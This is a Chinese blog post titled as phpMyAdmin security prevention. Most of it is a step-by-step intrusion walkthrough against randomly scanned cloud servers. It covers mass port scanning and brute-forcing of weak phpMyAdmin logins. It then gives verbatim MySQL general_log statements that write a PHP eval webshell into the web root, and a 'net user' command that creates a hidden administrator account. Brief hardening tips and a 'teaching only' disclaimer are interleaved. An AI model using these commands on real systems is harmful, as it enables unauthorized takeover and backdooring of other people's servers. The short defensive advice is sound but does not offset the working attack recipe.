phpmyadmin安全预防

时间:2022-06-07
本文章向大家介绍phpmyadmin安全预防,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。

头疼的安全

之前服务器总是本人黑,千疮百孔,只能一步步的去做一些安全防范,如何防范自然先从如何渗透开始.

文章及建议

前段时间看到了个phpmyadmin提权的教程,很多人都说现在那里还有root帐号root密码这种弱口令,今天给大家来一套完整的教学。

首先百度XX云X地区的IP段(你要是连几个国内云服务运营商的名字都不知道,那我就真的没办法了)。

找到以后百度随便找个工具扫描IP段,大的运营商一般直接后两个大段都是他的

然后找到IP段以后直接找一个80端口批量扫描的工具扫80端口,直接扫两个大段

我用的这个叫S-Xing,百度来的,不知道有没有后门,所以就不提供了

扫描好以后导入刚才扫描好的IP

然后选择自动后缀

线程根据自己配置来配置,我直接选择最高500,然后开始爆破

爆破结果

防范建议
这里的话,想要防范这一步,可以采取的方法有关闭phpMyAdmin,这个最直接了.
如果不关闭的话,建议更改访问的端口号.
然后默认密码必须修改,不可以使用简单密码.
目录的权限也最好下降到最低.

随便选择一个开搞

先看一下服务器信息xx.xx.xx.xx/l.php

网站路径什么的都爆出来了,登录后台

老规矩,查下mysql日志文件路径

先修改日志路径到当前网站路径,在开启日志,并插入一句话木马,然后关闭日志

SET global general_log_file='C:/phpStudy/PHPTutorial/WWW/sean.php';

修改当前日志文件到网站目录下

set global general_log = "ON"; 开启mysql记录日志

select '<?php eval($_POST[sean]);?>'; 插入PHP 一句话木马

set global general_log = "OFF"; 关闭mysql记录日志

执行成功

接下来上菜刀连接上传好的一句话木马

net user admin$ sean2018.. /add & net localgroup administrators admin$ /add创建一个管理员账号

账号已存在,那就直接修改密码了,带$符号的都是被影藏账号,估计被日了多少次了吧

接下来连接试试

防范建议
在这一步的话,防范的方法也有一些,比方说加一个安全狗软件,算是不错的了.
至于写文件的这个权限,刚刚如果降低了,应该问题不大,不过也有可以提升权限的一些工具,因此需要及时更新数据库和系统的bug.
至于执行命令创建用户的权限,只能简单做好预防和定期查看了,基本上到了上一步,所有的权限和账户已经有了.到了这里目前只有重装系统,才能干掉这个入侵者的份了.
当然,如果把所有的漏洞堵上,也可以不重装.但是后门太多,非专业人员,处理不会怎么全面.

玩完,收工,文章内所有的工具,百度一搜索一大把,我也是百度来的,不知道有没有后门所以就不提供下载了,怕中毒找个虚拟机搞,自己折腾吧。

华盟网原创,随便转载但请注明来自77169.COM,感谢支持!

本文章只做教学思路,请勿用于非法用途

说明

欢迎评论,欢迎指正,转载也请注明出处.

参考文章

phpmyadmin从找目标到拿下服务器

版本说明

20180806 开始着手文章

20180807 文章完成时间